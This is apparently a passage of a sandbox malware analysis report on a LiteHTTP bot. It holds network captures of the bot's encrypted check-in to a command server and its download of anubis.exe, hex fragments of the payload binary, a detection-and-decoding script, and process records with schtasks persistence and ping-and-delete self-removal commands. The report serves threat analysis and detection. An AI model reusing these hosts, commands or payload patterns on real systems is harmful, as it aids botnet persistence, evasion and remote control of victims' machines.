Jan 15, 2025 18:11:06.123167038 CET | 396 | OUT | Data Raw: 69 64 3d 6c 72 36 6e 6e 62 4a 65 55 2f 6c 54 61 54 4a 4e 7e 39 33 4b 59 7a 53 77 6a 54 72 7a 31 35 52 52 59 58 62 71 54 43 34 4d 7a 35 77 45 67 52 64 43 6a 7a 38 7a 42 30 6f 6f 7e 62 7e 4a 70 4d 77 47 78 53 32 52 62 43 4d 63 68 34 69 7a 30 61 6d
Data Ascii: id=lr6nnbJeU/lTaTJN~93KYzSwjTrz15RRYXbqTC4Mz5wEgRdCjz8zB0oo~b~JpMwGxS2RbCMch4iz0am7a3LcHgYL2T1bp1x4fhdSFg~5D9I=&os=rNDO65DvThI/Duzyf3MHA5RTsMmgdriu18kvAFToiz4=&pv=JdempBntA1DrujVGIs8Kcw==&ip=aOdxIYFMknrHsOX2fI~iXHdh4ovh9fvfkn2afeZTykc8G1h70j7w
Jan 15, 2025 18:11:06.301155090 CET | 175 | IN | HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Wed, 15 Jan 2025 17:11:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Jan 15, 2025 18:11:06.689896107 CET | 175 | IN | HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Wed, 15 Jan 2025 17:11:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
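What the three ETPRO alerts key on, and what the check-in bodies contain, as an added example (not Joe Sandbox, Emerging Threats or LiteHTTP code): the User-Agent is a fixed 32-hex-digit string rather than a browser string, the request is a form POST of exactly the fields id, os, pv and ip to a .php page, and the field values are base64 in which "+" has been replaced by "~" so that the value survives application/x-www-form-urlencoded decoding. The script reconstructs the first request and the first 200 OK reply from the capture, matches the request against those traits, and decodes the fields. The three fields the report displays in full decode to 80, 32 and 16 bytes, all multiples of 16, which is what a block cipher with padding produces; the capture shows neither the cipher nor the key, so the values stay opaque. The first reply is one 0x80-byte chunk of base64 (96 bytes decoded) followed by the terminating chunk; the later replies carry only the terminating chunk. The report displays fewer body bytes than the 367 declared in Content-Length, so the ip field is cut off and the decoder pads it instead of failing. The Expect: 100-continue header is the .NET HttpWebRequest default and is listed as a weak trait only.

```python
"""Match and decode the LiteHTTP check-in from session 0.

Added example, not Joe Sandbox, Emerging Threats or LiteHTTP code. The request
and reply are reconstructed from the capture above; the request body is as far
as the report displays it, so the last field ('ip') is cut off.
"""
import base64
import re
from urllib.parse import parse_qs

SAMPLE_REQUEST = (
    "POST /VmCetSC7/page.php HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3\r\n"
    "Host: 87.120.126.5\r\n"
    "Content-Length: 367\r\n"
    "Expect: 100-continue\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
    "id=lr6nnbJeU/lTaTJN~93KYzSwjTrz15RRYXbqTC4Mz5wEgRdCjz8zB0oo~b~JpMwGxS2RbCMch4iz0am7a3LcHgYL2T1bp1x4fhdSFg~5D9I="
    "&os=rNDO65DvThI/Duzyf3MHA5RTsMmgdriu18kvAFToiz4="
    "&pv=JdempBntA1DrujVGIs8Kcw=="
    "&ip=aOdxIYFMknrHsOX2fI~iXHdh4ovh9fvfkn2afeZTykc8G1h70j7w"
)

# Body of the first 200 OK: one 0x80-byte chunk, then the terminating chunk (CRLFs restored from the hex dump).
SAMPLE_REPLY_BODY = (
    b"80\r\n"
    b"831ZHcv8LQWfttA9IS303YLvyTwN4sbeTY6CkDywEwKqaO7GaKtHxH8MkEJanA3MNmrzuFtOuZaDKBevG2/ibP+EC9q5Hfc4iqzkG0KnSQGT6T7pIlGcPP6BrCuvtjdO"
    b"\r\n0\r\n\r\n"
)

HEX32_UA = re.compile(r"^[0-9A-Fa-f]{32}$")
CHECKIN_FIELDS = {"id", "os", "pv", "ip"}


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body); header names lower-cased."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def classify(raw):
    """Traits of one request that the three ETPRO alerts key on; [] means nothing matched."""
    method, path, headers, body = parse_request(raw)
    hits = []
    if HEX32_UA.match(headers.get("user-agent", "")):
        hits.append("hex32_user_agent")          # 'Observed LiteHTTP Bot Default User-Agent'
    is_form = headers.get("content-type", "").startswith("application/x-www-form-urlencoded")
    if method == "POST" and path.lower().endswith(".php") and is_form:
        if set(parse_qs(body, keep_blank_values=True)) == CHECKIN_FIELDS:
            hits.append("checkin_fields")        # 'CnC Checkin': exactly id, os, pv, ip
    if headers.get("expect", "").lower() == "100-continue":
        hits.append("expect_100_continue")       # .NET HttpWebRequest default; weak on its own
    return hits


def decode_value(value):
    """Bot-side base64 sends '+' as '~' so it survives form decoding; pad in case the value was truncated."""
    value = value.replace("~", "+")
    return base64.b64decode(value + "=" * (-len(value) % 4))


def field_lengths(raw):
    """Decoded length in bytes of every form field of the request."""
    body = parse_request(raw)[3]
    return {k: len(decode_value(v[0])) for k, v in parse_qs(body, keep_blank_values=True).items()}


def dechunk(body):
    """Reassemble a Transfer-Encoding: chunked body (hex size line, data, CRLF, ..., zero-size chunk)."""
    out, pos = b"", 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)
        if size == 0:
            return out
        out += body[end + 2:end + 2 + size]
        pos = end + 2 + size + 2


def decode_reply(body):
    """Server-side payload: dechunk, then base64 (plain '+' and '/', no '~' substitution needed)."""
    return decode_value(dechunk(body).decode("ascii"))
```

The field-set match is the strongest of the three traits on its own: the hex User-Agent changes with the build, and the 100-continue header is shared with every .NET HttpWebRequest client. Run classify() over proxy or IDS-reassembled requests, and keep field_lengths() for triage: once a field stops being a multiple of 16 bytes the encoding has changed and the decoder needs revisiting.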


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 59240 | 104.21.21.16 | 80 | 1380 | C:\Users\user\Desktop\random.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 18:11:03.437057972 CET | 84 | OUT | GET /dl/19480319/anubis.exe HTTP/1.1
Host: tmpfiles.org
Connection: Keep-Alive
Jan 15, 2025 18:11:04.169414997 CET | 1042 | IN | HTTP/1.1 301 Moved Permanently
Date: Wed, 15 Jan 2025 17:11:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://tmpfiles.org/dl/19480319/anubis.exe
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8sRvczVZSVbyc%2BfvtCOIf97Fn%2Fh7DioR2KSt%2F7wzY23yC74vvnDeJCKiakD8B8qAGhH1E514bLbvkKbD6kDlfIzXLGO9VYJ6qDughx6JYUhFm44%2FiF7EMVnxuTk1vOk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90277b993f887144-YUL
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=17576&min_rtt=17576&rtt_var=8788&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=84&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 59241 | 104.21.21.16 | 443 | 1380 | C:\Users\user\Desktop\random.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-15 17:11:04 UTC | 84 | OUT | GET /dl/19480319/anubis.exe HTTP/1.1
Host: tmpfiles.org
Connection: Keep-Alive
2025-01-15 17:11:05 UTC | 1140 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Jan 2025 17:11:05 GMT
Content-Type: application/x-dosexec
Content-Length: 38400
Connection: close
Content-Disposition: inline; filename=anubis.exe
Cache-Control: no-cache, private
CF-Cache-Status: BYPASS
Set-Cookie: XSRF-TOKEN=eyJpdiI6IlVhZzc3ZzU3d1NTcHFjUmhQUWRXWmc9PSIsInZhbHVlIjoiTnFGMVhUeS9tNUZ3ME1EUFhvMElxTjYvSkoxcCt4cHNyWlI3Y1VESWtTcWo1MFhFUmd2TlMySDRSZWp3dVBueEdoNGZ2WnMwQWlUUHFLN3p5UUx6Q1VvT3dOZlQ1eG9ZcTBTdEliS0xBejh6MHNsV0krNkVEcUs0UUFkb0pQTEMiLCJtYWMiOiI1YjE0MWRmZGQ1MzJmNThmMTE2NDUzNTRmMTU3NzIwZDUzNjcyNzAyNTg5ZjMxYzU1YTI5ZTQzOTEwZDIxYzdkIn0%3D; expires=Wed, 15-Jan-2025 19:11:05 GMT; Max-Age=7200; path=/; samesite=lax
Set-Cookie: tmpfiles_session=eyJpdiI6IkhUcTJCWXlsZmhXbC9lRy9lekVXTkE9PSIsInZhbHVlIjoiQUUrQzZHSUhERThReWxJczlGek9IOWFPdVRTZ05ndkluWXJCSmlBelpBNmNROUxRUXM2N3VaOFpsM0V4SVFnZzhRaUhOdkdyVHdKL2g2U0oyY3dVY1FqeXJYZDMzc2pCYjFFcHl3NzFhUWRjSkV1SFpKVitoUVNrTHlZRSs1elYiLCJtYWMiOiJiODlmZDNkZTI3ZGVmM2YxODEwMDc3NDMwNDc5Mjc0NGJjMWJkMjY4ZWYzMTgwNzZjMjhkYTg1NGExZGI1MmNlIn0%3D; expires=Wed, 15-Jan-2025 19:11:05 GMT; Max-Age=7200; path=/; httponly; samesite=lax
Accept-Ranges: bytes
2025-01-15 17:11:05 UTC | 615 | IN | Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 30 54 5a 6b 77 78 38 42 4b 77 54 4c 77 54 52 41 54 38 45 44 4d 4f 59 75 56 4b 25 32 42 47 59 79 68 6f 77 53 4e 53 72 68 6d 59 32 4e 4c 4e 54 64 46 61 49 54 49 6d 46 36 62 37 38 25 32 46 47 4a 78 44 54 66 34 71 62 72 44 66 77 49 72 31 54 53 73 5a 62 4b 53 55 6c 71 65 47 65 4c 33 64 30 67 38 69 58 48 4a 66 47 52 65 73 46 6f 42 72 62 5a 37 6a 6c 76 68 52 45 38 45 42 4b 5a 62 75 56 74 33 4c 6f 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c
Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0TZkwx8BKwTLwTRAT8EDMOYuVK%2BGYyhowSNSrhmY2NLNTdFaITImF6b78%2FGJxDTf4qbrDfwIr1TSsZbKSUlqeGeL3d0g8iXHJfGResFoBrbZ7jlvhRE8EBKZbuVt3Lo%3D"}],"group":"cf-nel","max_age":604800}NEL
2025-01-15 17:11:05 UTC | 1369 | IN | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e7 e2 87 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 8a 00 00 00 0a 00 00 00 00 00 00 8e a8 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELg0 @ `
2025-01-15 17:11:05 UTC | 1369 | IN | Data Raw: 00 07 6f 2d 00 00 0a 72 0f 01 00 70 6f 2e 00 00 0a 00 07 6f 2d 00 00 0a 72 25 01 00 70 02 72 35 01 00 70 28 25 00 00 0a 6f 2f 00 00 0a 00 07 6f 2d 00 00 0a 17 6f 30 00 00 0a 00 07 6f 2d 00 00 0a 16 6f 31 00 00 0a 00 07 6f 32 00 00 0a 26 07 6f 33 00 00 0a 00 00 de 0b 07 2c 07 07 6f 34 00 00 0a 00 dc 2a 00 00 01 10 00 00 02 00 1d 00 59 76 00 0b 00 00 00 00 1b 30 03 00 6f 00 00 00 04 00 00 11 00 28 35 00 00 0a 0a 00 06 1f 0a 1f 64 28 05 00 00 06 0b 06 20 f4 01 00 00 20 88 13 00 00 28 05 00 00 06 0c 06 07 08 28 05 00 00 06 0d 06 17 1b 28 05 00 00 06 13 04 16 13 05 2b 18 00 09 28 29 00 00 0a 00 06 07 08 28 05 00 00 06 0d 00 11 05 17 58 13 05 11 05 11 04 fe 04 13 06 11 06 2d dc 00 de 0b 06 2c 07 06 6f 34 00 00 0a 00 dc 2a 00 01 10 00 00 02 00 07 00 5c 63 00 0b
Data Ascii: o-rpo.o-r%pr5p(%o/o-o0o-o1o2&o3,o4*Yv0o(5d( (((+()(X-,o4*\c
                          2025-01-15 17:11:05 UTC1369INData Raw: 3c 00 00 0a 7d 0c 00 00 04 06 1f 1a 28 3e 00 00 0a 06 7b 0c 00 00 04 28 57 00 00 0a 28 3f 00 00 0a 7d 0d 00 00 04 06 7b 0d 00 00 04 28 58 00 00 0a 16 fe 01 0b 07 2c 15 00 06 7b 0c 00 00 04 06 7b 0d 00 00 04 17 28 59 00 00 0a 00 00 06 fe 06 3c 00 00 06 73 5a 00 00 0a 28 5b 00 00 0a 26 2a 00 00 1b 30 03 00 46 00 00 00 0c 00 00 11 00 00 28 3a 00 00 0a 6f 3b 00 00 0a 6f 3c 00 00 0a 0a 1f 1a 28 3e 00 00 0a 06 28 57 00 00 0a 28 3f 00 00 0a 0b 07 28 58 00 00 0a 16 fe 01 0c 08 2c 0b 00 06 07 17 28 59 00 00 0a 00 00 00 de 05 26 00 00 de 00 2a 00 00 01 10 00 00 00 00 01 00 3f 40 00 05 19 00 00 01 13 30 02 00 10 00 00 00 0d 00 00 11 00 28 0e 00 00 06 0a 06 16 28 0f 00 00 06 26 2a 22 02 28 5c 00 00 0a 00 2a 00 00 00 13 30 01 00 14 00 00 00 0e 00 00 11 02 28 01 00 00
                          Data Ascii: <}(>{(W(?}{(X,{{(Y<sZ([&*0F(:o;o<(>(W(?(X,(Y&*?@0((&*"(\*0(
                          2025-01-15 17:11:05 UTC1369INData Raw: 00 00 0a 6f 2b 00 00 0a 0a 06 72 c3 03 00 70 28 1d 00 00 0a 2d 06 06 14 fe 01 2b 01 17 0b 07 2c 0d 00 28 77 00 00 0a 6f 2b 00 00 0a 0a 00 06 0c 2b 00 08 2a 00 1b 30 03 00 7e 00 00 00 16 00 00 11 00 02 73 78 00 00 0a 0a 73 79 00 00 0a 0b 00 1a 8d 52 00 00 01 0c 16 0d 2b 3f 00 07 08 6f 37 00 00 0a 00 08 16 28 38 00 00 0a 20 ff ff ff 7f 5f 13 04 11 04 72 27 05 00 70 28 7a 00 00 0a 5d 13 05 06 72 27 05 00 70 11 05 28 7b 00 00 0a 6f 7c 00 00 0a 26 00 09 17 58 0d 09 02 fe 04 13 06 11 06 2d b7 00 de 0b 07 2c 07 07 6f 34 00 00 0a 00 dc 06 6f 65 00 00 0a 13 07 2b 00 11 07 2a 00 00 01 10 00 00 02 00 0e 00 58 66 00 0b 00 00 00 00 1b 30 06 00 01 03 00 00 18 00 00 11 00 28 22 00 00 0a 02 28 23 00 00 0a 6f 24 00 00 0a 0a 28 22 00 00 0a 28 22 00 00 0a 03 28 23 00 00 0a
                          Data Ascii: o+rp(-+,(wo++*0~sxsyR+?o7(8 _r'p(z]r'p({o|&X-,o4oe+*Xf0("(#o$("("(#
                          2025-01-15 17:11:05 UTC1369INData Raw: 55 00 00 0a 26 17 13 0a dd 14 02 00 00 00 72 2f 06 00 70 73 8c 00 00 0a 7a 00 73 52 00 00 0a 25 17 6f 30 00 00 0a 00 25 16 6f 31 00 00 0a 00 25 03 6f 2f 00 00 0a 00 13 0b 08 13 0d 11 0d 13 0c 11 0c 72 81 06 00 70 28 1d 00 00 0a 2d 4e 11 0c 72 8b 06 00 70 28 1d 00 00 0a 2d 4e 11 0c 72 95 06 00 70 28 1d 00 00 0a 2d 40 11 0c 72 9f 06 00 70 28 1d 00 00 0a 2d 5a 11 0c 72 a9 06 00 70 28 1d 00 00 0a 2d 74 11 0c 72 b3 06 00 70 28 1d 00 00 0a 3a 8b 00 00 00 38 9a 00 00 00 11 0b 09 6f 2e 00 00 0a 00 38 9d 00 00 00 11 0b 72 bd 06 00 70 6f 2e 00 00 0a 00 11 0b 72 cd 06 00 70 09 72 d7 06 00 70 03 28 67 00 00 0a 6f 2f 00 00 0a 00 2b 75 11 0b 72 dd 06 00 70 6f 2e 00 00 0a 00 11 0b 72 fb 06 00 70 09 72 d7 06 00 70 03 28 67 00 00 0a 6f 2f 00 00 0a 00 2b 4d 11 0b 72 3b 07
                          Data Ascii: U&r/pszsR%o0%o1%o/rp(-Nrp(-Nrp(-@rp(-Zrp(-trp(:8o.8rpo.rprp(go/+urpo.rprp(go/+Mr;
                          2025-01-15 17:11:05 UTC1369INData Raw: 80 07 00 00 04 72 45 09 00 70 80 08 00 00 04 2a 00 00 00 1b 30 04 00 0c 01 00 00 21 00 00 11 00 00 28 22 00 00 0a 03 6f 6c 00 00 0a 0a 02 28 a0 00 00 0a 0b 07 72 49 09 00 70 6f a1 00 00 0a 00 07 72 53 09 00 70 6f a2 00 00 0a 00 07 06 8e 69 6a 6f a3 00 00 0a 00 07 75 40 00 00 01 0c 08 14 fe 03 0d 09 2c 1a 00 08 72 97 09 00 70 6f a4 00 00 0a 00 08 20 98 3a 00 00 6f a5 00 00 0a 00 00 07 6f a6 00 00 0a 13 04 00 11 04 06 16 06 8e 69 6f a7 00 00 0a 00 00 de 0d 11 04 2c 08 11 04 6f 34 00 00 0a 00 dc 07 6f a8 00 00 0a 13 05 11 05 6f a9 00 00 0a 73 aa 00 00 0a 13 06 00 11 06 6f ab 00 00 0a 13 07 de 60 11 06 2c 08 11 06 6f 34 00 00 0a 00 dc 11 05 2c 08 11 05 6f 34 00 00 0a 00 dc 13 08 00 72 d9 09 00 70 11 08 6f 27 00 00 0a 28 28 00 00 0a 28 1e 00 00 0a 00 72 65 00
                          Data Ascii: rEp*0!("ol(rIporSpoijou@,rpo :ooio,o4ooso`,o4,o4rpo'(((re
                          2025-01-15 17:11:05 UTC1369INData Raw: 00 00 06 00 00 de 05 26 00 00 de 00 2a 00 01 10 00 00 00 00 01 00 28 29 00 05 19 00 00 01 1b 30 03 00 17 00 00 00 1d 00 00 11 00 00 16 0a 16 12 00 16 28 33 00 00 06 00 00 de 05 26 00 00 de 00 2a 00 01 10 00 00 00 00 01 00 10 11 00 05 19 00 00 01 2e 73 39 00 00 06 80 09 00 00 04 2a 13 30 02 00 2d 00 00 00 25 00 00 11 73 54 00 00 06 0a 06 28 c5 00 00 0a 7d 21 00 00 04 06 02 7d 22 00 00 04 06 15 7d 20 00 00 04 06 7c 21 00 00 04 12 00 28 06 00 00 2b 2a 00 00 00 1b 30 03 00 82 00 00 00 26 00 00 11 00 2b 7b 00 00 02 7b 0b 00 00 04 28 c7 00 00 0a 8e 16 fe 01 0a 06 2c 51 00 02 7b 0c 00 00 04 28 58 00 00 0a 16 fe 01 0b 07 2c 15 00 02 7b 0d 00 00 04 02 7b 0c 00 00 04 17 28 59 00 00 0a 00 00 73 52 00 00 0a 25 02 7b 0c 00 00 04 6f 2e 00 00 0a 00 25 16 6f 31 00 00 0a
                          Data Ascii: &*()0(3&*.s9*0-%sT(}!}"} |!(+*0&+{{(,Q{(X,{{(YsR%{o.%o1
                          2025-01-15 17:11:05 UTC1369INData Raw: 00 04 12 00 28 0b 00 00 2b 06 7c 40 00 00 04 28 1a 00 00 0a 2a 1b 30 02 00 6c 00 00 00 2d 00 00 11 00 73 d4 00 00 0a 0a 00 1f 26 28 3e 00 00 0a 0b 00 07 28 d5 00 00 0a 0c 16 0d 2b 22 08 09 9a 13 04 00 11 04 73 d6 00 00 0a 6f d7 00 00 0a 13 05 06 11 05 6f d8 00 00 0a 00 00 09 17 58 0d 09 08 8e 69 32 d8 00 de 1d 13 06 00 72 bb 0a 00 70 11 06 6f 27 00 00 0a 28 28 00 00 0a 28 1e 00 00 0a 00 00 de 00 06 13 07 2b 00 11 07 2a 01 10 00 00 00 00 07 00 40 47 00 1d 19 00 00 01 13 30 04 00 67 00 00 00 00 00 00 00 02 73 d4 00 00 0a 25 72 0f 0b 00 70 6f d8 00 00 0a 00 25 72 1f 0b 00 70 6f d8 00 00 0a 00 25 72 31 0b 00 70 6f d8 00 00 0a 00 25 72 4b 0b 00 70 6f d8 00 00 0a 00 25 72 63 0b 00 70 6f d8 00 00 0a 00 25 72 75 0b 00 70 6f d8 00 00 0a 00 25 72 7d 0b 00 70 6f d8
                          Data Ascii: (+|@(*0l-s&(>(+"sooXi2rpo'(((+*@G0gs%rpo%rpo%r1po%rKpo%rcpo%rupo%r}po
                          2025-01-15 17:11:05 UTC1369INData Raw: 04 02 73 59 00 00 06 7d 34 00 00 04 02 7b 34 00 00 04 02 7b 33 00 00 04 7d 28 00 00 04 00 02 7b 34 00 00 04 02 7b 2e 00 00 04 02 7b 34 00 00 04 7b 28 00 00 04 7b 25 00 00 04 72 81 06 00 70 28 28 00 00 0a 28 3f 00 00 0a 7d 27 00 00 04 02 7b 34 00 00 04 fe 06 5a 00 00 06 73 e0 00 00 0a 28 e1 00 00 0a 6f 5d 00 00 0a 0c 12 02 28 c9 00 00 0a 2d 43 02 16 25 0a 7d 2c 00 00 04 02 08 7d 36 00 00 04 02 0d 02 7c 2d 00 00 04 12 02 12 03 28 12 00 00 2b 00 dd e2 00 00 00 02 7b 36 00 00 04 0c 02 7c 36 00 00 04 fe 15 1e 00 00 01 02 15 25 0a 7d 2c 00 00 04 12 02 28 5e 00 00 0a 00 00 02 14 7d 34 00 00 04 02 14 7d 33 00 00 04 02 7c 32 00 00 04 28 d3 00 00 0a 3a f2 fe ff ff de 17 06 16 2f 12 02 7c 32 00 00 04 fe 16 09 00 00 1b 6f 34 00 00 0a 00 dc 02 7c 32 00 00 04 fe 15 09
                          Data Ascii: sY}4{4{3}({4{.{4{({%rp(((?}'{4Zs(o](-C%},}6|-(+{6|6%},(^}4}3|2(:/|2o4|2



                          Target ID:1
                          Start time:12:09:59
                          Start date:15/01/2025
                          Path:C:\Users\user\Desktop\random.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\random.exe"
                          Imagebase:0xcf0000
                          File size:38'400 bytes
                          MD5 hash:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000001.00000002.2010343903.00000000069B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000001.00000000.1340004308.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Target ID:3
                          Start time:12:10:42
                          Start date:15/01/2025
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:"schtasks.exe" /Create /SC ONLOGON /TN "TaskHelper" /TR "C:\Users\user\Desktop\random.exe" /F
                          Imagebase:0x5c0000
                          File size:187'904 bytes
                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:12:10:42
                          Start date:15/01/2025
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff70f010000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:12:10:43
                          Start date:15/01/2025
                          Path:C:\Users\user\Desktop\random.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\random.exe
                          Imagebase:0x8e0000
                          File size:38'400 bytes
                          MD5 hash:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:10
                          Start time:12:10:56
                          Start date:15/01/2025
                          Path:C:\Users\user\Desktop\random.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\random.exe"
                          Imagebase:0x100000
                          File size:38'400 bytes
                          MD5 hash:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:11
                          Start time:12:11:04
                          Start date:15/01/2025
                          Path:C:\Users\user\Desktop\random.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\random.exe"
                          Imagebase:0x2f0000
                          File size:38'400 bytes
                          MD5 hash:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:12
                          Start time:12:11:04
                          Start date:15/01/2025
                          Path:C:\Users\user\AppData\Roaming\cEp3d38.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\cEp3d38.exe"
                          Imagebase:0x7ff6fab70000
                          File size:38'400 bytes
                          MD5 hash:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\AppData\Roaming\cEp3d38.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\AppData\Roaming\cEp3d38.exe, Author: ditekSHen
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 21%, ReversingLabs
                          Reputation:low
                          Has exited:false

                          Target ID:13
                          Start time:12:11:04
                          Start date:15/01/2025
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:"cmd.exe" /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "C:\Users\user\Desktop\random.exe"
                          Imagebase:0xc50000
                          File size:236'544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:14
                          Start time:12:11:04
                          Start date:15/01/2025
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff70f010000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:15
                          Start time:12:11:04
                          Start date:15/01/2025
                          Path:C:\Windows\SysWOW64\PING.EXE
